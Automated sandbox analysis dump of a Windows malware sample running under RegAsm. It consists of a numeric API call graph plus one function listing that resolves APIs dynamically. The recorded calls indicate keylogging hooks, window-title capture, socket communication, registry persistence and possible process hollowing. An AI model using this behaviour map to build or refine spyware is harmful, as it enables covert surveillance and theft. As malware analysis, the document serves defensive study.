54678 41cc49 44 API calls 54676->54678 54679 41cc39 LoadLibraryA GetProcAddress 54676->54679 54677->54676 54678->54381 54679->54678 54993 41b539 FindResourceA 54680->54993 54683 43bda0 _Yarn 21 API calls 54684 40f428 ctype 54683->54684 54685 4020b7 28 API calls 54684->54685 54686 40f443 54685->54686 54687 401fe2 28 API calls 54686->54687 54688 40f44e 54687->54688 54689 401fd8 11 API calls 54688->54689 54690 40f457 54689->54690 54691 43bda0 _Yarn 21 API calls 54690->54691 54692 40f468 ctype 54691->54692 54996 406e13 54692->54996 54694 40f49b 54694->54383 54696 40fb5e 54695->54696 54698 40fb65 54695->54698 54999 402163 11 API calls 54696->54999 54698->54391 55000 401fab 54699->55000 54701 40d0ae CreateMutexA GetLastError 54701->54440 55001 41c048 54702->55001 54707 401fe2 28 API calls 54708 41b390 54707->54708 54709 401fd8 11 API calls 54708->54709 54710 41b398 54709->54710 54711 4135e1 31 API calls 54710->54711 54713 41b3ee 54710->54713 54712 41b3c1 54711->54712 54714 41b3cc StrToIntA 54712->54714 54713->54446 54715 41b3e3 54714->54715 54716 41b3da 54714->54716 54718 401fd8 11 API calls 54715->54718 55010 41cffa 22 API calls 54716->55010 54718->54713 54720 407765 54719->54720 54721 413584 3 API calls 54720->54721 54722 40776c 54721->54722 54722->54458 54722->54459 54724 41bd03 54723->54724 54725 40b93f 28 API calls 54724->54725 54726 41bd0b 54725->54726 54726->54474 54728 401f22 54727->54728 54735 401f6a 54727->54735 54729 402252 11 API calls 54728->54729 54730 401f2b 54729->54730 54731 401f6d 54730->54731 54732 401f46 54730->54732 55012 402336 54731->55012 55011 40305c 28 API calls 54732->55011 54735->54482 54737 4139a0 54736->54737 54738 406e13 28 API calls 54737->54738 54739 4139b5 54738->54739 54740 4020f6 28 API calls 54739->54740 54741 4139c5 54740->54741 54742 4137aa 14 API calls 54741->54742 54743 4139cf 54742->54743 54744 401fd8 11 API calls 54743->54744 54745 4139dc 54744->54745 54745->54534 54747 4137c3 54746->54747 54748 4137fa 54746->54748 54751 4137d5 RegSetValueExA RegCloseKey 54747->54751 54749 401fd8 11 API calls 54748->54749 54750 40efd9 54749->54750 54750->54537 54751->54748 54753 409e3d _wcslen 54752->54753 54754 409e48 54753->54754 54755 409e5f 54753->54755 54756 40da6f 32 API calls 54754->54756 54757 40da6f 32 API calls 54755->54757 54758 409e50 54756->54758 54759 409e67 54757->54759 54761 401f13 28 API calls 54758->54761 54760 401f13 28 API calls 54759->54760 54762 409e75 54760->54762 54763 409e5a 54761->54763 54764 401f09 11 API calls 54762->54764 54766 401f09 11 API calls 54763->54766 54765 409e7d 54764->54765 55031 409196 28 API calls 54765->55031 54768 409eb4 54766->54768 55016 40a144 54768->55016 54769 409e8f 55032 403014 54769->55032 54774 401f13 28 API calls 54775 409ea4 54774->54775 54776 401f09 11 API calls 54775->54776 54776->54763 54778 40417e 28 API calls 54777->54778 54779 41b6ed 54778->54779 55231 4042fc 54779->55231 54782 403014 28 API calls 54783 41b703 54782->54783 54784 401f09 11 API calls 54783->54784 54785 41b70c 54784->54785 54786 401f09 11 API calls 54785->54786 54787 40f25e 54786->54787 54787->54614 54789 41355b RegQueryValueExA RegCloseKey 54788->54789 54790 40f31f 54788->54790 54789->54790 54790->54487 54790->54643 54792 40f3cd 54791->54792 54793 413a7a RegDeleteValueW 54791->54793 54792->54481 54793->54792 54795 40dd96 54794->54795 54796 41353a 3 API calls 54795->54796 54797 40dd9d 54796->54797 54801 40ddbc 54797->54801 55306 401707 54797->55306 54799 40ddaa 55309 4138b2 RegCreateKeyA 54799->55309 54802 414f65 54801->54802 54803 4020df 11 API calls 54802->54803 54804 414f79 54803->54804 55323 41b944 54804->55323 54807 4020df 11 API calls 54808 414f8f 54807->54808 54809 401e65 22 API calls 54808->54809 54810 414f9d 54809->54810 54811 43bb2c _strftime 40 API calls 54810->54811 54812 414faa 54811->54812 54813 414fbc 54812->54813 54814 414faf Sleep 54812->54814 54815 402093 28 API calls 54813->54815 54814->54813 54816 414fcb 54815->54816 54817 401e65 22 API calls 54816->54817 54818 414fd4 54817->54818 54819 4020f6 28 API calls 54818->54819 54820 414fdf 54819->54820 54821 41beac 28 API calls 54820->54821 54822 414fe7 54821->54822 55327 40489e WSAStartup 54822->55327 54824 414ff1 54825 401e65 22 API calls 54824->54825 54826 414ffa 54825->54826 54827 401e65 22 API calls 54826->54827 54872 415079 54826->54872 54828 415013 54827->54828 54830 401e65 22 API calls 54828->54830 54829 4020f6 28 API calls 54829->54872 54831 415024 54830->54831 54833 401e65 22 API calls 54831->54833 54832 41beac 28 API calls 54832->54872 54834 415035 54833->54834 54835 401e65 22 API calls 54834->54835 54837 415046 54835->54837 54836 406c59 28 API calls 54836->54872 54839 401e65 22 API calls 54837->54839 54838 401fe2 28 API calls 54838->54872 54840 415057 54839->54840 54841 401e65 22 API calls 54840->54841 54842 415069 54841->54842 55352 40473d 89 API calls 54842->55352 54844 41b580 80 API calls 54844->54872 54846 4151c7 WSAGetLastError 55353 41cb72 30 API calls 54846->55353 54847 40482d 3 API calls 54847->54872 54850 404f51 105 API calls 54850->54872 54851 4048c8 97 API calls 54851->54872 54852 402093 28 API calls 54852->54872 54853 404e26 99 API calls 54853->54872 54854 401e65 22 API calls 54854->54872 54855 40531e 28 API calls 54855->54872 54856 401e8d 11 API calls 54856->54872 54857 401e65 22 API calls 54858 415a6e 54857->54858 54858->54857 54859 43bb2c _strftime 40 API calls 54858->54859 55355 40b08c 85 API calls 54858->55355 54860 415b0a Sleep 54859->54860 54860->54872 54861 406383 28 API calls 54861->54872 54862 401fd8 11 API calls 54862->54872 54865 409097 28 API calls 54865->54872 54866 441ed1 20 API calls 54866->54872 54867 413733 3 API calls 54867->54872 54868 4135e1 31 API calls 54868->54872 54869 40417e 28 API calls 54869->54872 54872->54829 54872->54832 54872->54836 54872->54838 54872->54844 54872->54846 54872->54847 54872->54850 54872->54851 54872->54852 54872->54853 54872->54854 54872->54855 54872->54856 54872->54858 54872->54861 54872->54862 54872->54865 54872->54866 54872->54867 54872->54868 54872->54869 54873 401e65 22 API calls 54872->54873 54877 41bc1f 28 API calls 54872->54877 54878 41bb27 30 API calls 54872->54878 54879 41bdaf 28 API calls 54872->54879 54881 402f31 28 API calls 54872->54881 54882 402ea1 28 API calls 54872->54882 54883 402f10 28 API calls 54872->54883 54884 404aa1 61 API calls 54872->54884 54885 401f09 11 API calls 54872->54885 54886 404c10 265 API calls 54872->54886 54888 415aac CreateThread 54872->54888 55328 414f24 54872->55328 55333 41b871 54872->55333 55336 4145f8 54872->55336 55339 40ddc4 54872->55339 55345 41bcd3 54872->55345 55348 41bb77 GetLastInputInfo GetTickCount 54872->55348 55349 40f90c GetLocaleInfoA 54872->55349 55354 4052fd 28 API calls 54872->55354 54874 415474 GetTickCount 54873->54874 54875 41bc1f 28 API calls 54874->54875 54875->54872 54877->54872 54878->54872 54879->54872 54881->54872 54882->54872 54883->54872 54884->54872 54885->54872 54886->54872 54888->54872 55396 41ada8 106 API calls 54888->55396 54889->54399 54890->54406 54891->54410 54894 4020df 11 API calls 54893->54894 54895 406c65 54894->54895 54896 4032a0 28 API calls 54895->54896 54897 406c82 54896->54897 54897->54432 54899 4135ae RegQueryValueExA RegCloseKey 54898->54899 54900 40ebdf 54898->54900 54899->54900 54900->54429 54900->54447 54901->54436 54902->54465 54903->54458 54904->54449 54905->54464 54907 401f86 11 API calls 54906->54907 54908 40da8b 54907->54908 54909 40dae0 54908->54909 54910 40daab 54908->54910 54912 40daa1 54908->54912 54913 41c048 2 API calls 54909->54913 55412 41b645 29 API calls 54910->55412 54911 40dbd4 GetLongPathNameW 54916 40417e 28 API calls 54911->54916 54912->54911 54917 40dae5 54913->54917 54915 40dab4 54918 401f13 28 API calls 54915->54918 54919 40dbe9 54916->54919 54920 40dae9 54917->54920 54921 40db3b 54917->54921 54922 40dabe 54918->54922 54923 40417e 28 API calls 54919->54923 54925 40417e 28 API calls 54920->54925 54924 40417e 28 API calls 54921->54924 54929 401f09 11 API calls 54922->54929 54926 40dbf8 54923->54926 54927 40db49 54924->54927 54928 40daf7 54925->54928 55397 40de0c 54926->55397 54934 40417e 28 API calls 54927->54934 54932 40417e 28 API calls 54928->54932 54929->54912 54936 40db0d 54932->54936 54935 40db5f 54934->54935 54938 402fa5 28 API calls 54935->54938 54939 402fa5 28 API calls 54936->54939 54942 40db6a 54938->54942 54943 40db18 54939->54943 54940 402fa5 28 API calls 54941 40dc20 54940->54941 54944 401f09 11 API calls 54941->54944 54945 401f13 28 API calls 54942->54945 54946 401f13 28 API calls 54943->54946 54947 40dc2a 54944->54947 54948 40db75 54945->54948 54949 40db23 54946->54949 54950 401f09 11 API calls 54947->54950 54951 401f09 11 API calls 54948->54951 54952 401f09 11 API calls 54949->54952 54953 40dc33 54950->54953 54954 40db7e 54951->54954 54955 40db2c 54952->54955 54956 401f09 11 API calls 54953->54956 54957 401f09 11 API calls 54954->54957 54958 401f09 11 API calls 54955->54958 54959 40dc3c 54956->54959 54957->54922 54958->54922 54960 401f09 11 API calls 54959->54960 54961 40dc45 54960->54961 54962 401f09 11 API calls 54961->54962 54963 40dc4e 54962->54963 54963->54523 54964->54535 54965->54557 54967 413759 RegQueryValueExA RegCloseKey 54966->54967 54968 41377d 54966->54968 54967->54968 54968->54516 54969->54549 54972 434563 54970->54972 54971 43bda0 _Yarn 21 API calls 54971->54972 54972->54971 54973 40f10c 54972->54973 55417 443001 7 API calls 2 library calls 54972->55417 55418 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 54972->55418 55419 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 54972->55419 54973->54588 54978 402093 28 API calls 54977->54978 54979 40da3a 54978->54979 54980 41bcef 28 API calls 54979->54980 54981 40da45 54980->54981 54982 40da6f 32 API calls 54981->54982 54983 40da56 54982->54983 54984 401f09 11 API calls 54983->54984 54985 40da5f 54984->54985 54986 401fd8 11 API calls 54985->54986 54987 40da67 54986->54987 54987->54622 54988->54606 54990->54651 54991->54454 54994 41b556 LoadResource LockResource SizeofResource 54993->54994 54995 40f419 54993->54995 54994->54995 54995->54683 54997 4020b7 28 API calls 54996->54997 54998 406e27 54997->54998 54998->54694 54999->54698 55002 41b362 55001->55002 55003 41c055 GetCurrentProcess IsWow64Process 55001->55003 55005 4135e1 RegOpenKeyExA 55002->55005 55003->55002 55004 41c06c 55003->55004 55004->55002 55006 41360f RegQueryValueExA RegCloseKey 55005->55006 55007 413639 55005->55007 55006->55007 55008 402093 28 API calls 55007->55008 55009 41364e 55008->55009 55009->54707 55010->54715 55011->54735 55013 402347 55012->55013 55014 402252 11 API calls 55013->55014 55015 4023c7 55014->55015 55015->54735 55017 40a162 55016->55017 55018 413584 3 API calls 55017->55018 55019 40a169 55018->55019 55020 40a197 55019->55020 55021 40a17d 55019->55021 55037 409097 55020->55037 55022 40a182 55021->55022 55023 409ed6 55021->55023 55025 409097 28 API calls 55022->55025 55023->54580 55028 40a190 55025->55028 55065 40a268 29 API calls 55028->55065 55030 40a195 55030->55023 55031->54769 55199 403222 55032->55199 55034 403022 55203 403262 55034->55203 55038 4090ad 55037->55038 55039 402252 11 API calls 55038->55039 55040 4090c7 55039->55040 55041 404267 28 API calls 55040->55041 55042 4090d5 55041->55042 55043 40a1b4 55042->55043 55066 40b927 55043->55066 55046 40a205 55049 402093 28 API calls 55046->55049 55047 40a1dd 55048 402093 28 API calls 55047->55048 55050 40a1e7 55048->55050 55051 40a210 55049->55051 55052 41bcef 28 API calls 55050->55052 55053 402093 28 API calls 55051->55053 55054 40a1f5 55052->55054 55055 40a21f 55053->55055 55070 40b19f 31 API calls _Yarn 55054->55070 55057 41b580 80 API calls 55055->55057 55059 40a224 CreateThread 55057->55059 55058 40a1fc 55060 401fd8 11 API calls 55058->55060 55061 40a24b CreateThread 55059->55061 55062 40a23f CreateThread 55059->55062 55078 40a2b8 55059->55078 55060->55046 55063 401f09 11 API calls 55061->55063 55075 40a2c4 55061->55075 55062->55061 55072 40a2a2 55062->55072 55064 40a25f 55063->55064 55064->55023 55065->55030 55198 40a2ae 164 API calls 55065->55198 55067 40b930 55066->55067 55068 40a1d2 55066->55068 55071 40b9a7 28 API calls 55067->55071 55068->55046 55068->55047 55070->55058 55071->55068 55081 40a2f3 55072->55081 55097 40ad11 55075->55097 55139 40a761 55078->55139 55082 40a30c GetModuleHandleA SetWindowsHookExA 55081->55082 55083 40a36e GetMessageA 55081->55083 55082->55083 55085 40a328 GetLastError 55082->55085 55084 40a380 TranslateMessage DispatchMessageA 55083->55084 55086 40a2ab 55083->55086 55084->55083 55084->55086 55087 41bc1f 28 API calls 55085->55087 55088 40a339 55087->55088 55096 4052fd 28 API calls 55088->55096 55104 40ad1f 55097->55104 55098 40a2cd 55099 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 55100 40b93f 28 API calls 55099->55100 55100->55104 55104->55098 55104->55099 55105 41bb77 GetLastInputInfo GetTickCount 55104->55105 55107 40adbf GetWindowTextW 55104->55107 55109 40af17 55104->55109 55110 40b927 28 API calls 55104->55110 55112 40ae84 Sleep 55104->55112 55113 441ed1 20 API calls 55104->55113 55115 402093 28 API calls 55104->55115 55116 40ae0c 55104->55116 55120 406383 28 API calls 55104->55120 55122 403014 28 API calls 55104->55122 55123 41bcef 28 API calls 55104->55123 55124 40a671 12 API calls 55104->55124 55125 401f09 11 API calls 55104->55125 55126 401fd8 11 API calls 55104->55126 55127 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 55104->55127 55128 401f86 55104->55128 55132 434801 23 API calls __onexit 55104->55132 55133 43441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 55104->55133 55134 40907f 28 API calls 55104->55134 55136 40b9b7 28 API calls 55104->55136 55137 40b783 40 API calls 2 library calls 55104->55137 55138 4052fd 28 API calls 55104->55138 55105->55104 55107->55104 55111 401f09 11 API calls 55109->55111 55110->55104 55111->55098 55112->55104 55113->55104 55115->55104 55116->55104 55118 409097 28 API calls 55116->55118 55135 40b19f 31 API calls _Yarn 55116->55135 55118->55116 55120->55104 55122->55104 55123->55104 55124->55104 55125->55104 55126->55104 55129 401f8e 55128->55129 55130 402252 11 API calls 55129->55130 55131 401f99 55130->55131 55131->55104 55132->55104 55133->55104 55134->55104 55135->55116 55136->55104 55137->55104 55140 40a776 Sleep 55139->55140 55160 40a6b0 55140->55160 55142 40a2c1 55143 40a7b6 CreateDirectoryW 55148 40a788 55143->55148 55144 40a7c7 GetFileAttributesW 55144->55148 55145 401e65 22 API calls 55145->55148 55146 40a7de SetFileAttributesW 55146->55148 55147 4020df 11 API calls 55150 40a829 55147->55150 55148->55140 55148->55142 55148->55143 55148->55144 55148->55145 55148->55146 55148->55150 55173 41c482 55148->55173 55150->55147 55151 40a858 PathFileExistsW 55150->55151 55153 4020b7 28 API calls 55150->55153 55154 40a961 SetFileAttributesW 55150->55154 55155 401fd8 11 API calls 55150->55155 55156 401fe2 28 API calls 55150->55156 55157 406e13 28 API calls 55150->55157 55159 401fd8 11 API calls 55150->55159 55183 41c516 CreateFileW 55150->55183 55191 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 55150->55191 55151->55150 55153->55150 55154->55148 55155->55150 55156->55150 55157->55150 55159->55148 55161 40a75d 55160->55161 55163 40a6c6 55160->55163 55161->55148 55162 40a6e5 CreateFileW 55162->55163 55164 40a6f3 GetFileSize 55162->55164 55163->55162 55165 40a728 CloseHandle 55163->55165 55166 40a716 55163->55166 55167 40a71d Sleep 55163->55167 55169 40a73a 55163->55169 55164->55163 55164->55165 55165->55163 55192 40b117 84 API calls 55166->55192 55167->55165 55169->55161 55170 409097 28 API calls 55169->55170 55171 40a756 55170->55171 55172 40a1b4 125 API calls 55171->55172 55172->55161 55174 41c495 CreateFileW 55173->55174 55176 41c4d2 55174->55176 55177 41c4ce 55174->55177 55178 41c4f2 WriteFile 55176->55178 55179 41c4d9 SetFilePointer 55176->55179 55177->55148 55181 41c505 55178->55181 55182 41c507 CloseHandle 55178->55182 55179->55178 55180 41c4e9 CloseHandle 55179->55180 55180->55177 55181->55182 55182->55177 55184 41c540 GetFileSize 55183->55184 55185 41c53c 55183->55185 55193 40244e 55184->55193 55185->55150 55187 41c554 55188 41c566 ReadFile 55187->55188 55189 41c573 55188->55189 55190 41c575 CloseHandle 55188->55190 55189->55190 55190->55185 55191->55150 55192->55167 55194 402456 55193->55194 55196 402460 55194->55196 55197 402a51 28 API calls 55194->55197 55196->55187 55197->55196 55200 40322e 55199->55200 55209 403618 55200->55209 55202 40323b 55202->55034 55204 40326e 55203->55204 55205 402252 11 API calls 55204->55205 55206 403288 55205->55206 55207 402336 11 API calls 55206->55207 55208 403031 55207->55208 55208->54774 55210 403626 55209->55210 55211 403644 55210->55211 55212 40362c 55210->55212 55213 40365c 55211->55213 55214 40369e 55211->55214 55220 4036a6 55212->55220 55217 4027e6 28 API calls 55213->55217 55219 403642 55213->55219 55229 4028a4 22 API calls 55214->55229 55217->55219 55219->55202 55221 402888 22 API calls 55220->55221 55222 4036b9 55221->55222 55223 40372c 55222->55223 55224 4036de 55222->55224 55230 4028a4 22 API calls 55223->55230 55227 4027e6 28 API calls 55224->55227 55228 4036f0 55224->55228 55227->55228 55228->55219 55236 404353 55231->55236 55233 40430a 55234 403262 11 API calls 55233->55234 55235 404319 55234->55235 55235->54782 55237 40435f 55236->55237 55240 404371 55237->55240 55239 40436d 55239->55233 55241 40437f 55240->55241 55242 404385 55241->55242 55243 40439e 55241->55243 55304 4034e6 28 API calls 55242->55304 55244 402888 22 API calls 55243->55244 55245 4043a6 55244->55245 55247 404419 55245->55247 55248 4043bf 55245->55248 55305 4028a4 22 API calls 55247->55305 55250 4027e6 28 API calls 55248->55250 55258 40439c 55248->55258 55250->55258 55258->55239 55304->55258 55312 43ab1a 55306->55312 55310 4138f4 55309->55310 55311 4138ca RegSetValueExA RegCloseKey 55309->55311 55310->54801 55311->55310 55315 43aa9b 55312->55315 55314 40170d 55314->54799 55316 43aaaa 55315->55316 55317 43aabe 55315->55317 55321 44062d 20 API calls _abort 55316->55321 55319 43aaaf __alldvrm _abort 55317->55319 55322 4489d7 11 API calls 2 library calls 55317->55322 55319->55314 55321->55319 55322->55319 55326 41b98a ctype ___scrt_get_show_window_mode 55323->55326 55324 402093 28 API calls 55325 414f84 55324->55325 55325->54807 55326->55324 55327->54824 55329 414f33 55328->55329 55330 414f3d getaddrinfo WSASetLastError 55328->55330 55356 414dc1 29 API calls ___std_exception_copy 55329->55356 55330->54872 55332 414f38 55332->55330 55357 41b847 GlobalMemoryStatusEx 55333->55357 55335 41b886 55335->54872 55358 4145bb 55336->55358 55340 40dde0 55339->55340 55341 41353a 3 API calls 55340->55341 55342 40dde7 55341->55342 55343 413584 3 API calls 55342->55343 55344 40ddff 55342->55344 55343->55344 55344->54872 55346 4020b7 28 API calls 55345->55346 55347 41bce8 55346->55347 55347->54872 55348->54872 55350 402093 28 API calls 55349->55350 55351 40f931 55350->55351 55351->54872 55352->54872 55353->54872 55355->54872 55356->55332 55357->55335 55361 41458e 55358->55361 55362 4145a3 ___scrt_initialize_default_local_stdio_options 55361->55362 55365 43f7ed 55362->55365 55368 43c540 55365->55368 55369 43c580 55368->55369 55370 43c568 55368->55370 55369->55370 55372 43c588 55369->55372 55390 44062d 20 API calls _abort 55370->55390 55391 43a837 36 API calls 3 library calls 55372->55391 55374 43c598 55392 43ccc6 20 API calls 2 library calls 55374->55392 55375 43c56d _abort 55383 43502b 55375->55383 55378 43c610 55393 43d334 51 API calls 3 library calls 55378->55393 55379 4145b1 55379->54872 55382 43c61b 55394 43cd30 20 API calls _free 55382->55394 55384 435036 IsProcessorFeaturePresent 55383->55384 55385 435034 55383->55385 55387 435078 55384->55387 55385->55379 55395 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 55387->55395 55389 43515b 55389->55379 55390->55375 55391->55374 55392->55378 55393->55382 55394->55375 55395->55389 55398 40de14 55397->55398 55399 402252 11 API calls 55398->55399 55400 40de1f 55399->55400 55401 4041d9 28 API calls 55400->55401 55402 40dc0b 55401->55402 55403 402fa5 55402->55403 55404 402fb4 55403->55404 55405 402ff6 55404->55405 55410 402feb 55404->55410 55414 40323f 55405->55414 55407 402ff4 55408 403262 11 API calls 55407->55408 55409 40300d 55408->55409 55409->54940 55413 403211 28 API calls 55410->55413 55412->54915 55413->55407 55415 4036a6 28 API calls 55414->55415 55416 40324c 55415->55416 55416->55407 55417->54972 55422 40f7fd 55420->55422 55421 413584 3 API calls 55421->55422 55422->55421 55423 40f8a1 55422->55423 55425 40f891 Sleep 55422->55425 55430 40f82f 55422->55430 55426 409097 28 API calls 55423->55426 55424 409097 28 API calls 55424->55430 55425->55422 55429 40f8ac 55426->55429 55428 41bcef 28 API calls 55428->55430 55431 41bcef 28 API calls 55429->55431 55430->55424 55430->55425 55430->55428 55435 401f09 11 API calls 55430->55435 55438 402093 28 API calls 55430->55438 55442 4137aa 14 API calls 55430->55442 55453 40d0d1 112 API calls ___scrt_get_show_window_mode 55430->55453 55454 41384f 14 API calls 55430->55454 55432 40f8b8 55431->55432 55455 41384f 14 API calls 55432->55455 55435->55430 55436 40f8cb 55437 401f09 11 API calls 55436->55437 55439 40f8d7 55437->55439 55438->55430 55440 402093 28 API calls 55439->55440 55441 40f8e8 55440->55441 55443 4137aa 14 API calls 55441->55443 55442->55430 55444 40f8fb 55443->55444 55456 41288b TerminateProcess WaitForSingleObject 55444->55456 55446 40f903 ExitProcess 55457 412829 62 API calls 55448->55457 55454->55430 55455->55436 55456->55446 55458 40165e 55459 401666 55458->55459 55460 401669 55458->55460 55461 4016a8 55460->55461 55463 401696 55460->55463 55462 43455e new 22 API calls 55461->55462 55464 40169c 55462->55464 55465 43455e new 22 API calls 55463->55465 55465->55464 55466 426cdc 55471 426d59 send 55466->55471 55472 41e04e 55473 41e063 ctype ___scrt_get_show_window_mode 55472->55473 55474 41e266 55473->55474 55475 432f55 21 API calls 55473->55475 55480 41e21a 55474->55480 55486 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 55474->55486 55479 41e213 ___scrt_get_show_window_mode 55475->55479 55477 41e277 55478 432f55 21 API calls 55477->55478 55477->55480 55482 41e2b0 ___scrt_get_show_window_mode 55478->55482 55479->55480 55481 432f55 21 API calls 55479->55481 55484 41e240 ___scrt_get_show_window_mode 55481->55484 55482->55480 55487 4335db 55482->55487 55484->55480 55485 432f55 21 API calls 55484->55485 55485->55474 55486->55477 55490 4334fa 55487->55490 55489 4335e3 55489->55480 55491 433509 55490->55491 55492 433513 55490->55492 55491->55489 55492->55491 55493 432f55 21 API calls 55492->55493 55494 433534 55493->55494 55494->55491 55495 4338c8 3 API calls 55494->55495 55495->55491 55496 426c6d 55502 426d42 recv 55496->55502

                                                                Executed Functions

                                                                Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$LibraryLoad$HandleModule
                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                • API String ID: 4236061018-3687161714
                                                                • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
